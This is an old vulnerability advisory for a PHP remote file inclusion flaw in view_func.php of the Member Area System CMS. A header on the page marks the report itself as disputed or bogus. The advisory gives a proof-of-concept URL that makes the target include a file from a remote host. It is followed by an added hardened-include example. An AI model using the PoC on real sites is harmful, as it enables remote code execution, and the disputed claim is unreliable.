WARNING! Fake news / Disputed / BOGUS

Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

2008.01.16
Credit: ship_nx
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------------------------------
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)
----------------------------------------------------------------------
Author: ShipNX <ship_nx [AT] yahoo com>
Impact: Remote file include
Status: Patch not available
----------------------------------------------------------------------
Software description:

Name: Member Area System (MAS)
Version: Vendor does not disclose version information since v1.7. Probably later versions are also vulnerable.
Vendor: Mansion Productions
Vendor homepage: http://www.mansionproductions.com/
Software homepage: http://www.mansionproductions.com/mas/
Description: MAS is a leading content management system (CMS) specially designed for managing adult-oriented sites. It is used on many major adult sites around the world.
----------------------------------------------------------------------
Vulnerability:

Code: view_func.php

    ...
    $path=dirname($i).'/';
    include($path.$l.'/'.'filelist.mas');
    ...

The variables $i and $l are not properly sanitized before being used in the include() construction. If Register Globals = On and Allow URL Include (Allow URL Fopen) = On, an attacker can send a malicious request leading to remote file inclusion and therefore arbitrary command execution.
----------------------------------------------------------------------
POC:

Conditions:
Register Globals = On
Allow URL fopen (Allow URL include since PHP 5.2.0) = On

http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?

Note: justsomedir/ is required here because the data passed via $i is first sent to the dirname() function, which will produce $path='http://remotesite.com/'; the remote file should be placed at http://remotesite.com/testfile.txt
----------------------------------------------------------------------
Workaround:

The vendor has been aware of the vuln for ages (probably since 2006), so they recommend setting Register Globals = Off.
Not sure why they haven't patched the vuln already. If Register Globals is Off on your server, then you are more or less secure. If it is On, ask your system administrator to turn it Off. If for some reason you need Register Globals = On on your site (using old software etc.), then contact the vendor and MAYBE they will finally patch the bug :-)
----------------------------------------------------------------------
History:

Vuln found: Late 2005 :-))
Vendor notified: Seems like the vendor has known of the vuln since 2006, but for some reason fails to patch it. Maybe they just want to keep it quiet, or maybe security matters just don't bother them - not sure. Anyway, maybe this advisory will finally force them to do the patching :-))
Advisory: 11/01/2008
----------------------------------------------------------------------
Thanks to: DeZender creators :-)
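The following is an added illustration of the fix a developer would apply in code, rather than relying on php.ini alone; it is not MAS code and not part of the advisory. The page quotes only two lines of view_func.php, so the surrounding request handling, the directory layout (templates under a base directory as <area>/<list>/filelist.mas) and the function names are assumptions. The vulnerable pattern is reproduced next to a hardened version that reads its parameters explicitly, restricts them to plain path segments and confirms the resolved file stays inside the base directory.

```php
<?php
// Added example (not MAS code). Names, layout and helper functions are assumed.

// Vulnerable pattern as quoted in the advisory. With register_globals=On,
// $i and $l arrive straight from the query string; with allow_url_include=On
// (allow_url_fopen before PHP 5.2.0) dirname($i) can yield a URL prefix,
// so include() fetches and executes a remote file.
function vulnerable_include_path(string $i, string $l): string
{
    $path = dirname($i) . '/';
    return $path . $l . '/' . 'filelist.mas';
}

// Hardened version. Returns the absolute path to include, or null if the
// request is not acceptable. $base_dir is the only directory that may be
// served from (assumption: templates live at $base_dir/<area>/<list>/filelist.mas).
function safe_include_path(string $base_dir, array $request): ?string
{
    // 1. Read parameters explicitly; never depend on register_globals.
    $i = isset($request['i']) ? (string) $request['i'] : '';
    $l = isset($request['l']) ? (string) $request['l'] : '';

    // 2. Accept only plain path segments: no '/', no '..', no "http:" scheme,
    //    no NUL bytes. This alone rules out every URL and traversal value.
    $segment = '/^[A-Za-z0-9_-]{1,64}$/';
    if (!preg_match($segment, $i) || !preg_match($segment, $l)) {
        return null;
    }

    // 3. Resolve symlinks and '.' components, then check containment so a
    //    symlink inside $base_dir cannot lead outside it.
    $base = realpath($base_dir);
    $candidate = realpath($base_dir . '/' . $i . '/' . $l . '/filelist.mas');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage in view_func.php (assumed). Defence in depth: even with this check in
// place, php.ini should still carry register_globals=Off and
// allow_url_include=Off so a second, unaudited include() cannot reopen the hole.
$file = safe_include_path(__DIR__ . '/members', $_GET);
if ($file === null) {
    http_response_code(400);
    exit('invalid request');
}
include $file;
```

The allowlist in step 2 is the part that actually closes the advisory's issue: a value such as `http://remotesite.com/justsomedir/` fails the regular expression before dirname() or include() ever sees it, so the outcome no longer depends on which php.ini flags happen to be set on the host.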

